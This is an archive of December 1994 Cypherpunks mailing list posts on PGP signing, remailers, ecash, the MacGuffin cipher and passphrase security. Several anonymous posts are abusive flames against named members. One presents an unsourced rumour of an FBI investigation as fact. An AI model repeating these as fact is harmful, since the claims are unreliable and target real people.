Proposal Message-ID: <01HK58WQ7JS291XZ1M@delphi.com> -----BEGIN PGP SIGNED MESSAGE----- I have never posted to this list before because I am rather new to it. What bothers me is that as a Hardware Technician it is the Cypherpunks that inspired me to flagellate myself at my keyboard while invoking the deity of Borland in ANSI 'C' to compile my source code. Ok, so it never works but the idea of the Cypherpunks has made me a (limited) programmer none the less. *Not* signing messages because you are asked to flies in the face of the purpose it serves. To spread the word about PGP and, as it has done, uncover any difficulties that may still exist in the propagation and utilitization of PGP. In actuality the amount of mail that suggests the difficulty in performing PGP signing should be a call to all Cypherpunks to start coding. Instead, like a child that has been asked to play with a favorite toy, there is refusal based soley on....I won't do it because you asked me to do it. Forging signatures is a waste of resources that could be better spent finding ways to smooth the path for PGP and similar encrypting/signing implementations. If I want to be anonymous I will use CHAIN and go thru a remailer. My .sig and PGP sig say the rest. ***************************Frenchie Sends*************************** * Key ID: BEB3ED71 J.Francois PGP Key on Request* * As soon as any man says of the affairs of the state * * "What does it matter to me?" the state may be given up for lost. * * J.J.Rousseau - The Social Contract * ****************Want to know more about PGP? Ask me!**************** -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt6IjrbmxeO+s+1xAQEo8AP/e1L7c/GGHqoRMQ0OyoA0nVyMvbVo3CdP UmAqFhR4V0D4nXnK0PFZqKrkBzJDxpvCb5mJSS4F6KAnMl6Oa5aq055g/9GHEPZb RvDEiraxcJ8y6vwOfrhxyOrDxX/2/g3sHds9lekBDc71Z72FS6Ix3A1KJjI+o2hP HSx6rt+qHc8= =UOH6 -----END PGP SIGNATURE----- From adam at bwh.harvard.edu Thu Dec 1 19:38:40 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Thu, 1 Dec 94 19:38:40 PST Subject: public accounts / PGP / passphrases In-Reply-To: <9412020242.AA10706@toxicwaste.media.mit.edu> Message-ID: <199412020338.WAA20381@bwh.harvard.edu> Derek wrote: | What do you use to contact your public machine? Do you dial in from | home? What kind of machine do you have at home? You might consider | running PGP at home if that is at all possible. | | It would be nice to integrate PGP into terminal emulators, too, like | kermit or seyon or red ryder or whatever, so that you could easily use | PGP locally to sign/encrypt things on the remote end. Wishful | thinking, I guess... I think terminal emulators are the wrong layer for PGP integration. PGP support is needed in document editors and viewers, rather than in network layers. With direct ip connectivity becoming commonplace, we're seeing PGP integrated into mail & news tools, which is a great thing. (There is also a use for encrypting networks, but I think it is different from the use for PGP, which is a document oriented system.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From rfb at lehman.com Thu Dec 1 19:49:36 1994 From: rfb at lehman.com (Rick Busdiecker) Date: Thu, 1 Dec 94 19:49:36 PST Subject: 1% suspicion In-Reply-To: <199411302114.NAA06386@netcom20.netcom.com> Message-ID: <9412020348.AA19940@cfdevx1.lehman.com> From: "Timothy C. May" Date: Wed, 30 Nov 1994 13:14:36 -0800 (PST) I suspect fewer than 1% of all messages have their sigs checked. What do you mean? If you mean that fewer than 1% of the signed messages that are sent to cypherpunks, you're almost certainly incorrect. I read over 1% of the messages on this list and if a message is signed, with either a header signature or a big-ugly-block signature, it's checked before I get to read it. If you count seperate deliveries as seperate messages then you're almost certainly correct, although it seems like an uninteresting data point. If you're talking about clear-signed messages sent to the net as a whole rather than just this list, I think it's an interesting question, but I can't imagine what you're basing your suspicion on. Rick From eric at remailer.net Thu Dec 1 20:28:29 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 20:28:29 PST Subject: making public keys public In-Reply-To: <199412020227.VAA06380@bb.hks.net> Message-ID: <199412020527.VAA14718@largo.remailer.net> From: lmccarth at ducie.cs.umass.edu If you're not going to make the public key public, why use public key cryptography at all ? Save time and effort and use a symmetric cipher. You can't do authentication with a shared secret key, because there's nothing to differentiate the two sides of the link. In addition, a closely held public key might be held by 10 people; with secret keys there are 90 different private keys instances to manage. Eric From die at pig.die.com Thu Dec 1 17:54:10 1994 From: die at pig.die.com (Dave Emery) Date: Thu, 1 Dec 1994 20:54:10 -0500 (EST) Subject: recent voice over data In-Reply-To: <199412020157.RAA14321@largo.remailer.net> from "Eric Hughes" at Dec 1, 94 05:57:18 pm Message-ID: > > From: "Dave Emery" > > I can't quite see how this would work unless the voice was run > at a very low level relative to the data. > > I believe there are also maximum rates on the data when used with > voice (4.8 kbps?) and the modulation doesn't use echo cancellation. > > This whole thing has an interesting security consequence - retrieving the voice under data off a crude alligator clip type 2 wire wiretap may be difficult because it requires knowing the data going in both directions. So if one sends random or cryptographically secure pseudo random data one might be able to do a reasonable job of hiding the voice channel from simple wiretapping technology even though it is analog rather than digital. And generating random data with a noise diode and a UART is easy to do and very secure. It is already known that retrieving both streams of data from a two wire tap (voltage only) when neither data stream is known or predictable is difficult or even nearly impossible to do with modern near-end-echo cancelling modem modulations such as V.32 and V.34, and without this capability the voice would almost certainly not be intelligable over the roar of the modem tones. Granted this is not the kind of security one gets from strong encryption, but it is easy to do and makes wiretapping a lot harder.... If I were concerned with securing my calls from most threats other than the TLA's I think spending 640 bucks for two of these modems and a little box with a UART and a noise diode might be a cheap and dirty voice privacy hack. Certainly it would defeat the idly curious and the private eye divorce investigator types... Dave Emery N1PRE (PGP signature out for repair) From tjb at acpub.duke.edu Thu Dec 1 21:00:24 1994 From: tjb at acpub.duke.edu (Thomas J. Bryce) Date: Thu, 1 Dec 94 21:00:24 PST Subject: setting up an non remailer Message-ID: <199412020500.AAA00872@carr2.acpub.duke.edu> setting up an anon remailer To those who might know the answer.... I'm running a power mac here, and I have an ethernet port and my own IP address. To do email, I telnet to my University's unix system. I was thinking, this sort of arrangement might allow me to set up an anon remailer. Does anyone know if I can do this? If the technology is available? If there is a way to do this from a macintosh, I'd like to give it a try. Of course, I would ask the sys admins if necessary for permission. (i.e., if it can come straight to my IP address then it isn't necessary I assume). Thanks Tom From cjl at welchlink.welch.jhu.edu Thu Dec 1 21:05:44 1994 From: cjl at welchlink.welch.jhu.edu (cjl) Date: Thu, 1 Dec 94 21:05:44 PST Subject: Diffie, Blaze, Berman, Rivest, Bizdos Message-ID: C-punks, To those of you who are not members of the American Association for the Advancement of Science (i.e. subscribers to SCIENCE Magazine) I thought I would forward some information on their upcoming meeting in Atlanta. Enclosed is a response I received in response to a query to the address amsie95 at aaas.org. The response was from rsmariga at aaas.org and I quote: You asked specifically about the "Privacy and Encryption in an Electronic Environment" session. Organized by Alex Fowler of AAAS and Caroline Whitbeck of MIT, this session is scheduled for Tuesday, February 21. There will be speakers in both the morning and the afternoon. >> Blurb in printed version I have includes the following: >> Learn about the rapid deployment of encryption technologies, their use >> in ensuring communications security, the legal and ethical >> interpretations of privacy, and the ongoing debate between government >> and non-government professionals Morning speakers Matt Blaze, AT&T Bell Labs Topic: Deciphering the Mechanics of Encryption George Trubow, John Marshall Law School Topic: Privacy Issues in an Electronic Environment Joan Winston*, U.S. Congress Office of Technology Assessment Topic: Privacy, Encryption, and Public Policy Jerry Berman*, Electronic Frontier Foundation Topic: Clinton's Clipper Chip Proposal Afternoon speakers Marc Rotenberg, Electronic Privacy Info Ctr Topic: The Responsibility of Computer Professionals Ronald Rivest, MIT Topic: Encryption and Scientific Freedom Peter Szolovits*, MIT Topic: Privacy, Encryption, and the Proposed Health Care Identifier James Bidzos, RSA Data Security Topic: Encryption and the Protection of Corporate Privacy Jeffrey Ritter: Ohio Supercomputer Ctr Topic: International Aspects of Privacy and Encryption * Invited speaker, not yet confirmed If you have any further questions, please feel free to contact us. We hope to see you in Atlanta. Robert Smariga Registrar AAAS Meetings 1333 H St, NW Washington, DC 20005 phone: (202) 326-6410 fax: (202) 289-4021 end quote. I note that I also asked for info regarding the Information Security session which I guess I have to key in :-) Information Security: Principles and Public Policy Monday pm, Feb. 20th, 1995 Organized by Joan Feigenbaum, AT&T Bell Labs To address concerns about the authenticity, integrity, and privacy of electronic information: An overview of the mathematical theory of information security, the social and legal structure in which the digital society is emerging, anad the new service and products available. Speakers: Joan Feigenbaum, AT&T Bell Labs The Mathematical Theory of Information Security Stuart Haber, Surety Technologies, Inc. Ensuring the Integrity of Digital Documents Daniel Schutzer, Citicorp Tech. Office Secure Consumer Banking over the Internet Whitfield Diffey, Sun Microsystems Rights and Responsibilities in a Digital World ObCurrentThread: I'd sign this if it were a lot easier too. But then, some Cypherpunks write genetic code. C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / ) From remailer-admin at goldenbear.com Thu Dec 1 21:16:24 1994 From: remailer-admin at goldenbear.com (Anonymous User) Date: Thu, 1 Dec 94 21:16:24 PST Subject: No Subject Message-ID: <199412020515.AA16050@ideath.goldenbear.com> I don't know what is going on here. This list seems to have bogged down in meta-issues. I am very disappointed with Eric Hughes' recent display of feather-fluffing. He seems to fail to understand that the list has absolutely NOTHING to do with him personally. The full subscriber base could MOVE IMMEDIATELY if so inclined, and indeed the atmosphere seems to be getting a bit oppressive here. I hate to say this but it reminds me of when all the Detweiler flames were erupting a long time ago. Detweiler seemed to be especially enraged with the way that E.Hughes ran the list in a dictatorial, "iron fist" way. He failed to understand that his own role was merely that of a janitor, not a celebrity with a personality cult. Is that all the cypherpunks list is about? I tell you that this idea that "cypherpunks code" does not mean anything. "cypherpunks talk about code endlessly" but when it comes down to it, this whole list is nothing but a lot of people STROKING EACH OTHER'S EGOS while the outsiders (Phil Zimmermann, Ralph Levien) are the only ones getting anything done!! From nobody at rahul.net Thu Dec 1 21:16:41 1994 From: nobody at rahul.net (nobody at rahul.net) Date: Thu, 1 Dec 94 21:16:41 PST Subject: DETWEILER IS SPOOFING US!!! Message-ID: <199412020516.AA02430@bolero.rahul.net> HE IS AT IT AGAIN!!! I know that the anonymous messages are obvious, but in fact I think detweiler is posting ALL KINDS OF TENTACLE GRAMS UNDER THE "MANDATORY SIGNATURE" THREAD UNDER VARIOUS ADDRESSES, mounting a flamewar of Detweilerian proportions!!! STOP POSTING UNDER THIS THREAD IMMEDIATELY!!! you are PLAYING INTO DETWEILER'S PLOY OF BRINGING CHAOS, ANARCHY AND DISUNITY TO THE CYPHERPUNK LIST!!! he is posting the messages that look "reasonable" but are really SUBTLE FLAMEBAIT. have you noticed all the unusual people posting lately??? they are DETWEILER TENTACLES!!!! From nobody at jpunix.com Thu Dec 1 21:17:00 1994 From: nobody at jpunix.com (Anonymous) Date: Thu, 1 Dec 94 21:17:00 PST Subject: FBI INVESTIGATING BLACKNET Message-ID: <199412020516.XAA06790@jpunix.com> A word to the wise: I can't reveal my sources but I have it on excellent authority that L.Detweiler was recently interrogated by two FBI Agents in Denver about BLACKNET. This is an investigation that has also involved contacting TIM MAY but he has so far refused to reveal this. The FBI Agent in Denver who investigated Detweiler is named JEFFERY DIEHL. The investigation is CONTINUING and is chiefly motivated by concerns about ECONOMIC ESPIONAGE, particularly ON THE INTERNET, by the FBI and other government agencies. From anonymous-remailer at shell.portal.com Thu Dec 1 21:36:12 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Thu, 1 Dec 94 21:36:12 PST Subject: ERIK HUGHES: EGOTISTICAL PRICK Message-ID: <199412020536.VAA08584@jobe.shell.portal.com> what is all this @#$%^&* about MANDATORY SIGNATURES ON THE CYPHERPUNKS LIST? who is Eric Hughes, DOROTHY DENNING??? who is going to force ME how to use cryptography??? a CYPHERPUNK??? this is BULLSHIT. eric hughes is a TRAITOR TO THE CYPHERPUNK CAUSE. it's so transparently obvious, this is nothing but a big ego ploy. "Look at me!!! I am cool!!! I have accomplished virtually nothing substantial in any cypherpunk area for a long time, all my major recent projects are failures that have gone nowhere, I don't follow my own rules of 'code, code, code', not 'blather, blather, blather', and this is one way I can stroke my ego and show off my utter brilliance in the lack of anything useful!!!" has he written one smidgeon of code to back up his ideas? NO!!! he has philosophized and pontificated about his IDEAS that he is PLANNING to put into code. frankly, I see absolutely NO EVIDENCE WHATSOEVER of the perseverence required to build a solid foundation in this noisy bozo. he flames away against the people who are REALLY doing something. what is this about "founding" the cypherpunks? no one is my leader, I am not a part of a movement that takes credit for MY hardworking accomplishments as glory for "founders". why don't someone ask him why he went to go work with Chaum a long time ago and CAME BACK. I'll give you a hint: HE DIDN'T CUT THE MUSTARD. ask him why he hasn't graduated from college!! hint: HE DIDN'T CUT THE MUSTARD. he is paralyzed by his own perfectionism straightjacket, rather than building SOMETHING that works haphazardly he builds NOTHING that works AT ALL. oh, so he built a remailer. BIG DEAL. what kind of brains does it take to call sendmail with a message? to cut off headers on a file? good lord, how many commands in SED is this? so he wrote it in PERL??? *wow*, I am *really* impressed now!!! this is BS!!!! let's find a NEW LIST. a list is a COMMUNITY PROPERTY. anyone who pulls this kind of prickery, insinuating they are in the "bully pulpit", deserves CYPERSPATIAL EXCOMMUNICATION for HIGH TREASON TO THE CYPHERPUNK CAUSE of TOTAL AUTONOMY FOR THE INDIVIDUAL. From cjl at welchlink.welch.jhu.edu Thu Dec 1 21:37:53 1994 From: cjl at welchlink.welch.jhu.edu (cjl) Date: Thu, 1 Dec 94 21:37:53 PST Subject: C-punx Corallary (sp?) Message-ID: If a thread on the C-punx list lasts long enough, the initials L.D. appear shortly before the invocation of the N*zis, usually posted by L.D. himself -) (blind lemon smiley) C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / ) From dfloyd at io.com Thu Dec 1 21:38:30 1994 From: dfloyd at io.com (dfloyd at io.com) Date: Thu, 1 Dec 94 21:38:30 PST Subject: setting up an non remailer In-Reply-To: <199412020500.AAA00872@carr2.acpub.duke.edu> Message-ID: <199412020538.XAA14638@pentagon.io.com> > > > setting up an anon remailer > > To those who might know the answer.... > > I'm running a power mac here, and I have an ethernet port and my own IP > address. To do email, I telnet to my University's unix system. > > I was thinking, this sort of arrangement might allow me to set up an anon > remailer. Does anyone know if I can do this? If the technology is available? > > If there is a way to do this from a macintosh, I'd like to give it a try. > Of course, I would ask the sys admins if necessary for permission. (i.e., > if it can come straight to my IP address then it isn't necessary I assume). > > Thanks > > Tom > I don't see any remailer scripts for Macs, but there is a way. Get Mach10 from Tenon Intersystems, which is a generic BSD UNIX, and configure it to run a plain UNIX remailer. From cactus at hks.net Thu Dec 1 21:52:25 1994 From: cactus at hks.net (L. Todd Masco) Date: Thu, 1 Dec 94 21:52:25 PST Subject: ERIK HUGHES: EGOTISTICAL PRICK In-Reply-To: <199412020536.VAA08584@jobe.shell.portal.com> Message-ID: <3bmcu5$934@bb.hks.net> In article <199412020536.VAA08584 at jobe.shell.portal.com>, wrote: >this is BS!!!! let's find a NEW LIST. a list is a COMMUNITY >PROPERTY. anyone who pulls this kind of prickery, insinuating >they are in the "bully pulpit", deserves >CYPERSPATIAL EXCOMMUNICATION for HIGH TREASON TO THE CYPHERPUNK >CAUSE of TOTAL AUTONOMY FOR THE INDIVIDUAL. Right on! Party on Cypherwonks, Larry's buying! -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller From eric at remailer.net Thu Dec 1 21:55:42 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 21:55:42 PST Subject: ERIK HUGHES: EGOTISTICAL PRICK In-Reply-To: <199412020536.VAA08584@jobe.shell.portal.com> Message-ID: <199412020654.WAA14876@largo.remailer.net> ask him why he hasn't graduated from college!! A.B. 1988 University of California, Berkeley. Mathematics. GPA 3.9. Eric From hfinney at shell.portal.com Thu Dec 1 22:09:09 1994 From: hfinney at shell.portal.com (Hal) Date: Thu, 1 Dec 94 22:09:09 PST Subject: Scalability of Ecash System / Article on Internet Cash available. Message-ID: <199412020608.WAA12408@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- One thing that could be done with the on-line ecash system would be to decentralize the task of detecting double-spending. DigiCash could set up a large number of coin validation centers on the net, dispersed geographically to equalize the load. Then the merchants would do a simple hash algorithm on the electronic coin to determine which validation center to use. That center only records spent coins which have the specified hash. Since any attempt to double-spend would mean re-use of a particular coin, both instances would hash to the same validation center and so the re-use would be detected. This way if a validation center went down it would hamper but not stop electronic commerce. Other coins could perhaps be offered in payment in place of those which cannot be validated (although this would require a certain amount of trust of the shop, but perhaps not much more than is necessary already). This might address some of the scalability concerns raised with the on-line cash system. Another idea comes from the NetCash people. Here you have the customer get a payment token from the bank which is made out to the specific merchant desired and given a time-stamp, perhaps good for one day. Now the merchant can accept these, check the signature, and check its own database of tokens which it has received earlier that day. As long as the incoming token is not in the database, the merchant can accept the payment with confidence and turn the tokens in to the bank for credit later as in an off-line system. Effectively these tokens would be digital cashier's checks. The big problem with this is the difficulty of the customer getting his payment token anonymously. If the bank knows the customer who is asking for a particular "cashier's check" to be cut then it learns the customer's spending patterns, defeating his privacy. So there would have to be some communication infrastructure to allow for anonymous connections in order for this system to work. Chaum, as it happens, has written on this topic as well, with his "Mix" and "DC-Net" systems for anonymous communications. Unfortunately, these systems have scaling problems of their own and don't appear to be entirely satisfactory for this purpose. Hal Finney hfinney at shell.portal.com -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLt651RnMLJtOy9MBAQEzfwIApLw5dPjil4unqa0yToT1Wm5/kczvnE/E IdXrWqhbVz32VqKw1d6QrG/I20t8RiZSG+yuBCPSOcoMi9XMRs2nnw== =EJTS -----END PGP SIGNATURE----- From cactus at hks.net Thu Dec 1 22:18:14 1994 From: cactus at hks.net (cactus at hks.net) Date: Thu, 1 Dec 94 22:18:14 PST Subject: 2nd release of signing software Message-ID: <199412020623.BAA09742@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- I've made a couple of changes to the format of outgoing messages that should hopefully make life easier for readers. The most noticable will be the movement of the blurb, but also very significant is the removal of the "Reply-To: " (feh on the proliferation of MUA behaviors) header, and way down on the "noticable" list is an "Errors-To: " and a "Sender: " header. Thanks for y'all's comments: keep 'em coming. - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBFAwUBLt69EyoZzwIn1bdtAQGLEwF8DAyzBUf0Z86xPHPKWsSaGM6cqSWJOrV8 kGDmEaQooJ9WhSYA5aOo1NtVZjgwOUgP =KRYJ -----END PGP SIGNATURE----- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.] From mab at research.att.com Thu Dec 1 22:34:35 1994 From: mab at research.att.com (Matt Blaze) Date: Thu, 1 Dec 94 22:34:35 PST Subject: Paper available on new cipher Message-ID: <9412020624.AA16990@merckx.info.att.com> Bruce Schneier and I have been designing a block cipher, called "MacGuffin", based on a new variant of the standard Feistel (S-P) network structure. We are presenting a paper describing the cipher, entitled "The MacGuffin Block Cipher Algorithm", at the Leuven crypto algorithms workshop later this month. Here's the abstract: \begin{abstract} This paper introduces MacGuffin, a 64 bit ``codebook'' block cipher. Many of its characteristics (block size, application domain, performance and implementation structure) are similar to those of the U.S. Data Encryption Standard (DES). It is based on a Feistel network, in which the cleartext is split into two sides with one side repeatedly modified according to a keyed function of the other. Previous block ciphers of this design, such as DES, operate on equal length sides. MacGuffin is unusual in that it is based on a {\em generalized unbalanced Feistel network (GUFN)} in which each round of the cipher modifies only 16 bits according to a function of the other 48. We describe the general characteristics of MacGuffin architecture and implementation and give a complete specification for the 32-round, 128-bit key version of the cipher. \end{abstract} A PostScript preprint of the paper is available via anonymous FTP from: ftp://research.att.com/dist/mab/mcg.ps A forthcoming paper will discuss the characteristics GUFN structure in more detail. Comments and analysis greatly appreciated. -matt From mpd at netcom.com Thu Dec 1 22:38:31 1994 From: mpd at netcom.com (Mike Duvos) Date: Thu, 1 Dec 94 22:38:31 PST Subject: public accounts / PGP / passphrases In-Reply-To: <199412020218.VAA06287@bb.hks.net> Message-ID: <199412020639.WAA04821@netcom6.netcom.com> lmccarth at ducie.cs.umass.edu writes: > Could someone please elaborate on the foolishness of using > PGP with a passphrase on a public machine (as I do) ? It is not secure to use your private key on a machine that you do not have physical control over. It is probably secure to store a passphrase-protected private key on such a machine, as long as you do not feed it into a program which decrypts it. > Am I wrong in thinking that my secret key is useless to an > intruder until she guesses my passphrase ? Or monitors your keystrokes as you type in your passphrase, or watches your address space as PGP uses the key, etc etc... Given the state of Unix security, I would certainly not want to type my passphrase into a Unix box unless I was the only user, was directly connected to the box through a wire I could see, and had just done a fresh boot after verifying the MD5 hash on all the OS binaries. Not likely to be the case at your average public installation. > I have no net access except via an account on a public > machine, so I'm not about to start storing my secret key > elsewhere, but I'll change my passphrase to if it's > irrelevant anyway. Having a passphrase will protect against casual acquisition of your private key, but only physical security when the key is used will protect you against a determined opponent. --- As long as I am typing, permit me to add my two cents to the "digital signatures on the list" flame war. Like many proponents of strong cryptography, I rarely use it in everyday life. I occasionally encrypt personal mail to friends overseas when I know it is going to take numerous hops over insecure links en route, and I will digitally sign mail or Usenet articles if I want to say something that I consider important in a way that cannot be altered or spoofed. This happens rarely. I would consider having to digitally sign everything I post to the list, no matter how frivilous, the moral equivalent of being allowed to speak only while under sworn oath. Now oaths and notaries are certainly useful things in appropriate places, like courtrooms and lawyers offices, but I don't think any of us would care to live our lives having our every utterance subject to their certification. It would certainly not aid our cause to have the government be able to point and say - "Even the cypherpunks make people digitally identify themselves when posting messages to their list" - while at the same time attempting to explain to people why we aren't happy with Chaum's less than anonymous ECash or Web sites that require registration and personal information before permitting access to privacy-related material. The Net, like life, offers a certain plausable deniability in what has been said, and who has said it. Some of the best messages on the list in past years have been Tim's witty and entertaining spoofs of his ideological opponents. Let's save absolute certainty about the real or pseudo-anonymous identities of speakers in this forum for times when, in the sole opinion of the person posting, such certainty is deemed necessary. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. $ From werewolf at io.org Thu Dec 1 22:48:08 1994 From: werewolf at io.org (Mark Terka) Date: Thu, 1 Dec 94 22:48:08 PST Subject: DETWEILER IS SPOOFING US!!! In-Reply-To: <199412020516.AA02430@bolero.rahul.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199412020516.AA02430 at bolero.rahul.net>, nobody at rahul.net wrote: > >noticed all the unusual people posting lately??? they are >DETWEILER TENTACLES!!!! I for one, resent being called a tentacle.....although it IS one notch above being called an asshole.... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt6+0K+YbMzawbu5AQEhjgQAvP4nKOZwGpji/0ybEHQH3bQUGGDI9xaQ Bq7jgQL980kUYpX4cb0emyJrPaG+qidQtkGOj3IThJMU3DyrFR6IAxL1BcFztQlm 2l9Q34CTDCcLFNBFaIvJ0JiaebvsAHN6L2AMz9xTnr14H3vbqmDa3ropc1iX9Hea 6o33VskKslg= =o73Y -----END PGP SIGNATURE----- From shamrock at netcom.com Thu Dec 1 23:04:06 1994 From: shamrock at netcom.com (Lucky Green) Date: Thu, 1 Dec 94 23:04:06 PST Subject: Brands excluded from digicash beta Message-ID: <199412020704.XAA19579@netcom18.netcom.com> Ralph wrote: >I also have had no luck getting a beta client from digicash. I >"registered" through their WWW forms page, and got no response for >about a month. Then they sent me mail saying that they would be >sending a client, but that they were unrolling it in stages. That was >about a month ago. Perhaps this means I will get my client soon. > >This does not speak well for digicash. If they were not ready to beta >their stuff, they should not have announced it. As it is, it makes >them look like a flake. Here is one possible explanation: As their beta test agreement states, the beta software is not licensed for use in the US. Some legal thing that I don't understand. A few US users are part of the beta test, probably because they kept bothering the guy who hands out the beta UID's early in the morning before he had his coffee. I know that the people on this list have been advocating ecash long before a sinlge line of code was written and that we all deserve an early try of the software. I am forwarding this to some of the folks at DigiCash, perhaps we can convince them to broaden the beta. -- Lucky Green PGP encrypted mail preferred. "The very atmosphere of firearms anywhere and everywhere restrains evil interference - they deserve a place of honor with all that's good." From nobody at c2.org Thu Dec 1 23:06:57 1994 From: nobody at c2.org (Anonymous User) Date: Thu, 1 Dec 94 23:06:57 PST Subject: Tim May is RIGHT!!! Message-ID: <199412020705.XAA07308@zero.c2.org> I'm sorry I can't say so under my real name, but I *vehemently agree* with Tim May about the authoritarian, heavy handed, generally outrageous egotism of Eric Hughes of recent. This is REALLY UPSETTING. Eric should be ASHAMED OF HIMSELF for strutting around like a peacock. he is EMBODYING THE DICTATORIAL APPROACH HE CLAIMS TO DEFY VIA CYPHERPUNK PHILOSOPHY. this is truly the most HYPOCRITICAL AND EGOMANIACAL action I have seen by anyone in recent times on this list. Tim May will leave the list? GOOD FOR YOU, TIM. Get the hell out of here. Eric Hughes may have had some good ideas ONCE UPON A TIME but hasn't kept up his end of the bargain of the cypherpunk agenda for a LONG, LONG TIME. just a WASHED-UP HAS BEEN, who defies the very ideals that he claims to espouse in the most dictatorial manner possible. oh, what's this? you're just going to DELAY the messages that don't have signatures? well, I'm sure the government would just love to slightly DELAY THE MAIL of people who don't have the proper ESCROWED KEYS. what's this? you aren't going to move to any more "serious" measures, such as actually BANNING UNSIGNED MAIL, at least, NOT YET? oh, THANK YOU, MR. ALMIGHTY GOD OF CYBERSPACE. ah, I'm sure Louis Freeh feels the same way---we aren't proposing any minor change that PREVENTS YOUR FREEDOMS, are we? gosh, the government is starting to look awfully nice in comparison to the TYRANNY OF A DICTATOR. this scene is getting REALLY STALE. oh, Mr. CYPHERPUNK FOUNDER, please tell me once again how you started this list, and how the volumes of posts by the public are really YOUR PERSONAL PROPERTY, and this is YOUR LIST. we are your "guests"???? BULLSHIT. any host that treats his guests like this is NOT A HOST. this is not graciousness but the crabby and cranky bossiness of a STELLAR INGRATE and a EGOTISTICAL JERK. From anonymous-remailer at xs4all.nl Thu Dec 1 23:07:52 1994 From: anonymous-remailer at xs4all.nl (Name withheld on request) Date: Thu, 1 Dec 94 23:07:52 PST Subject: PGP Tools under Linux Message-ID: <199412020709.AA04740@xs1.xs4all.nl> -----BEGIN PGP SIGNED MESSAGE----- >I am using PGPTools to handle all the crypto functions in the second >generation remailer that I have written. All the copies of PGPTools that I >have found seem to be set up to compile on SUN workstations only. That's interesting, because I developed it under Linux and MS/DOS, and there was a lot of trouble at the beginning with it not running on big-endian machines. It sounds like whoever "fixed" it for sparcs broke it for little-endian machines. The original should still be on ftp.csn.net; get it there and it should work. >Mixmaster is both a remailer and a front end, and therefor must run on many >different platforms. I have been able to compile PGPTools on Linux and >FreeBSD, but PGPTools produces invalid RSA blocks. If you (or anyone else >reading this) have ported PGPTools to other platforms could you send me the >source and makefile, or point me to them. If not, could you help me do it, >the source code is a tangle, and it will take me a long time to do on my own >(I am a brute force programer, not a C wizard). Get the original, test it, and post the results. Some people have asked if I am still around. Yes, I am, and I'm thinking about a major update of PGPTools. The update would involve getting out any persistent bugs I can find, cleaning up the code and making it completely reentrant, and replacing all 2.3a modules with 2.6.x modules so it is patent-safe. It also needs some kind of exception handling for disk errors and the like. A pass-through function for the disk access calls, and a way of freeing all memory before a longjmp to bail out, for example. Before doing this, I need to hear from the PGP development team. There have been rumors of an upcoming PGP API, something similar to PGPTools. If this is the case, let me know so I don't waste time writing an incompatible version. If this is not the case, let me know so I can get started. More information about NexusBucks, please. Is it for real? How many coins in circulation? Have any services been bought with them yet? What is the address of the Magic Money server? Is it fully automatic, or are messages being manually processed? "There's never been a time in our history where it's been possible to place information beyond the reach of the collective efforts of society, but with modern cryptography you can." - Phil Zimmermann "Large primes united, will never be divided!" - Pr0duct Cypher -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt6cDcGoFIWXVYodAQGZ8AP/bZASa9sn+QzDiQkDJqacBAPhpqQHfkhL 7kWh7belMm8gA6KFmLfZcPywCWm3zU1QOS2+xRzPUGP0f7MrQjDuj3h7M4X3fDDV DiybwF4rIUAs2wBubioTYwE+as6N//CmfbtpkRdPVWhg5rnvgEOU+lzEvkhFt0tc 2MzkmHTBvIQ= =CSzj -----END PGP SIGNATURE----- From alex at omaha.com Thu Dec 1 23:21:13 1994 From: alex at omaha.com (Alex Strasheim) Date: Thu, 1 Dec 94 23:21:13 PST Subject: CSPAN Message-ID: <199412020722.BAA00166@omaha.omaha.com> -----BEGIN PGP SIGNED MESSAGE----- Although it was probably an exercise in futitility, I sent a note to CSPAN suggesting that they have PRZ as a guest on the Booknotes program that Brian Lamb hosts. I figured that maybe they could have him on in conjunction with the book version of PGP that the MIT press is coming out with. In my note I made the argument that policy concerning cryto is really policy concerning wiretapping and surveillance, and that technological changes are eroding the status quo and forcing us to decide whether we want a lot more surveillance (or at least the potential for it) or a lot less, that since this is going to have a lot to do with how the police interact with the public in the future, it's an important issue, etc. At the end, I appended the transcript of the talk PRZ gave in NYC that was recently posted to the list. I found that particular text to be pretty impressive, and I'm hoping that the folks at CSPAN will as well. There are a few details that I hope will go over well: MIT's involvement, the fact that PRZ has debated the NSA's general counsel, the quotes from the FBI director, etc. On top of that, the conference from which the transcript came seems like the sort of event that CSPAN would televise. I don't know Phil, and I don't know if he'd even want to appear on the program. But there are two things about Booknotes that I think would make it a very good forum for the cryto debate. First of all, Phil would have enough time to explain the issues. That's important, because this isn't something that can be easily packed into a sound byte. Also, although I don't know this for a fact, I would imagine that the program would probably be a pretty good way to reach people on this Hill, both members and staffers. Anyway, I sent them Phil's phone number and his email address. The encouraging thing is that I sent this out more than a day ago, and I haven't heard back from them yet. Ordinarily, when you send them email you get a form letter back within an hour or two. That gives me some hope that maybe some people over there are reading the transcript, and that perhaps they're thinking about it. I don't know if CSPAN is open to lobbying or not, but the more I think about it, the more it seems to me that it could be a very useful forum for the debate. I think it would be worthwhile to let them know the next time Phil's going to 